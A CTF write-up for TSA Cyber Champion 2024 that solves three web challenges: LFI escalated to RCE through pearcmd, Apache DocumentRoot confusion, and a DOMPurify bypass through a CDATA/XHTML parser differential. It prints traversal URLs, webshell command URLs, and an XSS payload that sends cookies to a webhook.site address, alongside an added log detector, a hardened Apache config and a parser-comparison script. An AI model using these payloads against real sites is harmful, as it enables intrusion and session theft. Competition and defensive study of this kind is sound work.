# Description
CTF write-up for TSA Cyber Champion CTF 2024. I took part in this CTF competition with team "njir zeta wangy banget".
This write-up only covers the Website Exploitation challenges (3 out of 4 solved); we placed 7th out of 238 teams.
Thanks to @daffainfo, @HyggeHalcyon, and @Dmcr, who participated with me.
[toc]
# 101 - Web Exploitation
> Web Hacking 101
URL: https://cyberchampion-web-101.chals.io/
Mirror: http://103.196.154.155:20000/
Author: Fedra
## TL;DR
LFI to Pearcmd RCE.
## Solve
We got a website like this.

There is a PING and a File Upload feature, but we'll skip those since our solve is likely unintended.
We noticed a parameter like this when moving to another page.
```
https://cyberchampion-web-101.chals.io/index.php?page=ping.php
```
Then we tried LFI.
```
https://cyberchampion-web-101.chals.io/index.php?page=../../../../../etc/passwd
```

The LFI worked, so now we have two methods to escalate this vulnerability.
1. Log Poisoning -> RCE
2. Pearcmd abuse -> RCE
Since the website was running Apache, I tried to access the log, but got permission denied.
Then we tried option two, `pearcmd`, using this reference.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#lfi-to-rce-via-php-pearcmd
We spawned a shell.

Then we accessed it like this:
```
https://cyberchampion-web-101.chals.io/index.php?page=../../../../../var/www/html/tol.php&c=ls+/
```

Since the RCE succeeded, we can get the flag.

```
TSA{Web_Hacking_101_c7319b0bd96f9d01981bbf52ebb7027f}
```
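As an added example that is not part of the original write-up, here is a small detector for Apache access logs that flags the kind of requests used in this challenge: traversal in the `page` parameter, absolute system paths, and references to `pearcmd`. The log lines are constructed from the URLs above and are not real traffic.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache "combined" log lines modelled on the requests in this write-up
# (sample input for the detector, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2024:10:01:02 +0000] "GET /index.php?page=ping.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Nov/2024:10:01:09 +0000] "GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Nov/2024:10:02:30 +0000] "GET /index.php?page=../../../../../var/www/html/tol.php&c=ls+/ HTTP/1.1" 200 310 "-" "curl/8.4.0"
10.0.0.7 - - [10/Nov/2024:10:03:11 +0000] "GET /cdn/?file=style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Nov/2024:10:03:40 +0000] "GET /cdn/?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Nov/2024:10:04:02 +0000] "GET /usr/share/apache2/default-site/index/ HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Directories that a page=/file= include parameter or a pretty-URL path should never reach.
SYSTEM_DIRS = ("/etc/", "/proc/", "/dev/", "/usr/", "/var/log/", "/var/www/")


def decode_twice(s):
    """URL-decode twice so double-encoded traversal (%252e%252e%252f) is caught as well."""
    return unquote(unquote(s))


def classify(target):
    """Return the sorted reasons a request target looks like LFI or path-confusion abuse."""
    parts = urlsplit(target)
    values = [decode_twice(parts.path)]
    values += [decode_twice(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    reasons = set()
    for v in values:
        if "../" in v or "..\\" in v:
            reasons.add("traversal")
        if any(d in v for d in SYSTEM_DIRS):
            reasons.add("system_path")
        if "pearcmd" in v.lower():
            reasons.add("pearcmd")
    return sorted(reasons)


def analyze(log_text):
    """Return (client ip, request target, reasons) for every suspicious log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify(m.group("target"))):
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in analyze(SAMPLE_LOG):
        print(ip, ",".join(reasons), target)
```

The benign `page=ping.php` and `file=style.css` requests are not flagged; the traversal, the encoded traversal, the webshell include and the absolute `/usr/share/...` path are.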
# File Not Found v2
> Author: dimas
Easy for those who can, hard for those who can't. Flag in /readflag -> /root/flag.txt
URL: http://playground.tcp1p.team:51669
## TL;DR
Apache misconfiguration leads to RCE.
## Solve
We got a website that looks static, like this.

Then we found an interesting parameter at
```
http://playground.tcp1p.team:51669/cdn/?file=style.css
```
We could do LFI through this parameter.

Since the challenge was given as a black box, we were a little confused at this stage.
Unlike the previous challenge, which used the `include` function, this one used `file_get_contents`, so we couldn't use pearcmd the same way.
After reading about the Apache config (the website uses Apache), we found this.
```apache
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    LogLevel alert rewrite:trace3
    DocumentRoot /var/www/html/
    <Directory />
        Require all granted
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
    RewriteEngine On
    RewriteRule ^/cdn/?$ /cdn.php [QSA,L]
    RewriteRule ^/(.*)/$ /$1.html [QSA,END]
</VirtualHost>
```
We also found a reference that was likely the intended solution for this challenge.
https://blog.orange.tw/posts/2024-08-confusion-attacks-en/#%F0%9F%94%A5-2-DocumentRoot-Confusion

That rule means, for example, that if we access `http://playground.tcp1p.team:51669/about/`, the server will look for `about.html` as well as `/var/www/html/about.html`.
To test what we found, we used a file from `/usr/share`, like this.
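As an added example (my own config, not the challenge's), here is the same vhost with the two settings that make the DocumentRoot confusion exploitable corrected: the filesystem-wide `Require all granted` is replaced by a grant on the web root only, and the pretty-URL rewrite is guarded by a `RewriteCond` so `$1` is only ever resolved under `DocumentRoot`.

```apache
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html/
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

    # Deny the whole filesystem by default. The challenge granted "/",
    # which is what allowed a rewritten /usr/share/... path to be served.
    <Directory />
        Require all denied
    </Directory>

    # Only the web root is readable by the server.
    <Directory /var/www/html>
        Require all granted
    </Directory>

    RewriteEngine On
    RewriteRule ^/cdn/?$ /cdn.php [QSA,L]

    # Pretty-URL rule: rewrite only when the target exists under DocumentRoot,
    # so a request for /usr/share/.../index/ is never mapped to an absolute path.
    # Current Apache releases also refuse a substitution whose first segment is
    # a backreference unless the UnsafePrefixStat flag is added; do not add it.
    RewriteCond %{DOCUMENT_ROOT}/$1.html -f
    RewriteRule ^/(.*)/$ /$1.html [QSA,END]
</VirtualHost>
```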
```
http://playground.tcp1p.team:51669/usr/share/apache2/default-site/index/
```

From this we were able to use `pearcmd` again to spawn a shell.

Then access it like this:
```
http://playground.tcp1p.team:51669/dev/shm/mentorz.php%3f/?c=ls+/
```

Then read the flag.

```
TSA{cyber_strike_web_problem_2.0}
```
# Eksploitasi Kerentanan XSS v2
> Website: http://playground.tcp1p.team:23218
Where's the bot?
Bot: http://playground.tcp1p.team:7719
Source : [xss.zip](https://drive.google.com/file/d/1S_D6sBHgf3uTtn4tADOnbUEZkoBaZVrj/view?usp=sharing)
## TL;DR
XSS using a CDATA payload (unintended).
## Solve
We got a website with an XSS vulnerability in it, but when we read the source code it was... hell yeah :joy:
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/dompurify/3.1.2/purify.min.js"></script>
<script>
  function normalize(s) {
    return new Promise((resolve, _) => {
      const frame = document.createElement("iframe");
      frame.sandbox = 'allow-same-origin';
      frame.hidden = true;
      frame.srcdoc = s;
      document.body.appendChild(frame);
      setTimeout(() => {
        const nestedFrames = frame.contentWindow.document.querySelectorAll("iframe");
        nestedFrames.forEach(nestedFrame => nestedFrame.remove());
        const content = frame.contentWindow.document.body.innerHTML;
        document.body.removeChild(frame);
        if (content.toLowerCase().includes("srcdoc")) resolve("");
        resolve(content);
      }, 1000);
    });
  }
  async function main() {
    const url = new URL(location)
    const html = url.searchParams.get("html")
    if (html) {
      document.getElementById("parameterInput").value = html
      document.getElementById("html").innerHTML = await normalize(DOMPurify.sanitize(html))
    }
  }
  main()
</script>
```
It seemed like there was no hope, but we found a similar challenge.
https://github.com/ImaginaryCTF/ImaginaryCTF-2023-Challenges/tree/main/Web/sanitized
This challenge also uses `xhtml`, and the solution is already explained on that GitHub page.

Then we modified the solver payload, like this:
```
<div><style><![CDATA[</style><div data-x="]]></style><img src='x' onerror='alert()'/><style><!--"></div><style>--></style></div>
```
And boom! We got a popup.
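Why the sanitizer lets this through, as an added example that is not part of the original write-up: the same payload parsed by an HTML parser (the view DOMPurify sanitizes) and by an XML parser (the view an XHTML page renders). Python's `html.parser` and `xml.etree` stand in for the browser's two parsers; the difference they show is the parser differential the payload relies on.

```python
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

# Constructed copy of the write-up's CDATA payload (the alert() variant).
PAYLOAD = ('<div><style><![CDATA[</style><div data-x="]]></style>'
           "<img src='x' onerror='alert()'/><style><!--\"></div>"
           '<style>--></style></div>')


class TagCollector(HTMLParser):
    """Record every element an HTML parser opens, with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def html_view(markup):
    """Elements as an HTML parser sees them (what DOMPurify sanitizes).
    <style> is a raw-text element, so '<![CDATA[' is just text and the
    <img ... onerror> lands inside the data-x attribute value, not as an element."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def xml_view(markup):
    """Elements as an XML/XHTML parser sees them (what the browser renders).
    <![CDATA[ ... ]]> is a real CDATA section that swallows the fake </style>
    and the start of the attribute, so the <img> becomes a live element."""
    root = ET.fromstring(markup)
    return [(el.tag, dict(el.attrib)) for el in root.iter()]


def event_handlers(tags):
    """Elements carrying an on* attribute, i.e. what a sanitizer must strip."""
    return [(t, a) for t, a in tags if any(k.startswith("on") for k in a)]


if __name__ == "__main__":
    print("HTML parser :", [t for t, _ in html_view(PAYLOAD)], event_handlers(html_view(PAYLOAD)))
    print("XHTML parser:", [t for t, _ in xml_view(PAYLOAD)], event_handlers(xml_view(PAYLOAD)))
```

The defensive takeaway is that the sanitizer and the renderer must agree on the parser: sanitizing an HTML-parsed DOM and then injecting the serialized string into an XHTML document is exactly the mismatch shown here.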

Then we changed it to our webhook, like this:
```
<div><style><![CDATA[</style><div data-x="]]></style><img src='x' onerror='location.replace(`https://webhook.site/4c2e277e-259d-462f-86cb-b457f59e7c09/?x`+document.cookie)' /><style><!--"></div><style>--></style></div>
```
Then send it to the bot; don't forget to change the domain, since the flag domain is `http://server/`.

We got the flag.

```
TSA{connection_pool_manipulation_to_get_xss}
```